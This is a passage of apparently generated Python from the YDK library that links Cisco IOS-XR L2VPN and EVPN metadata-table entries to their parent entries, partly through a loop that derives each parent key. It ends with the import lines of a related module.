_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info']
# Wire each child node's meta information to its parent's.
# In this generated table every parent key is the child key with the final
# dotted component stripped, so the parent key is derived with rsplit()
# instead of being spelled out a second time per assignment. The iteration
# order matches the original assignment order exactly.
for _child_key in (
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
    'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
    'L2Vpn.Database.PseudowireClasses.PseudowireClass',
    'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
    'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
    'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
    'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
    'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
    'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices',
    'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface',
    'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces',
    'L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup',
    'L2Vpn.Database.Redundancy.IccpRedundancyGroups',
    'L2Vpn.Database.G8032Rings',
    'L2Vpn.Database.XconnectGroups',
    'L2Vpn.Database.BridgeDomainGroups',
    'L2Vpn.Database.PseudowireClasses',
    'L2Vpn.Database.FlexibleXconnectServiceTable',
    'L2Vpn.Database.Redundancy',
    'L2Vpn.AutoDiscovery.BgpSignaling',
    'L2Vpn.Utility.Logging',
    'L2Vpn.Snmp.Mib.MibInterface.Format',
    'L2Vpn.Snmp.Mib.MibInterface',
    'L2Vpn.Snmp.Mib.MibPseudowire',
    'L2Vpn.Snmp.Mib',
    'L2Vpn.PwRouting',
    'L2Vpn.Neighbor',
    'L2Vpn.Database',
    'L2Vpn.Pbb',
    'L2Vpn.AutoDiscovery',
    'L2Vpn.Utility',
    'L2Vpn.Snmp',
    'GenericInterfaceLists.GenericInterface.Interfaces.Interface',
    'GenericInterfaceLists.GenericInterface.Interfaces',
    'GenericInterfaceLists.GenericInterface',
    'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs',
    'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address',
    'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget',
    'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets',
    'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher',
    'Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing',
    'Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery',
    'Evpn.EvpnTables.Evpnevis.Evpnevi',
    'Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher',
    'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList',
    'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0',
    'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving',
    'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers',
    'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment',
    'Evpn.EvpnTables.EvpnInterfaces.EvpnInterface',
    'Evpn.EvpnTables.EvpnTimers',
    'Evpn.EvpnTables.Evpnevis',
    'Evpn.EvpnTables.EvpnLoadBalancing',
    'Evpn.EvpnTables.EvpnbgpAutoDiscovery',
    'Evpn.EvpnTables.EvpnInterfaces',
    'Evpn.EvpnTables',
):
    # Parent key = child key with the last '.'-separated segment removed.
    _parent_key = _child_key.rsplit('.', 1)[0]
    _meta_table[_child_key]['meta_info'].parent = _meta_table[_parent_key]['meta_info']
# NOTE(review): dataset-concatenation artifact removed here — the stray rows
# "| 59.957011 | 406 | 0.594403 |" were table metadata (avg/max line length,
# alphanumeric fraction), not valid Python source.
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
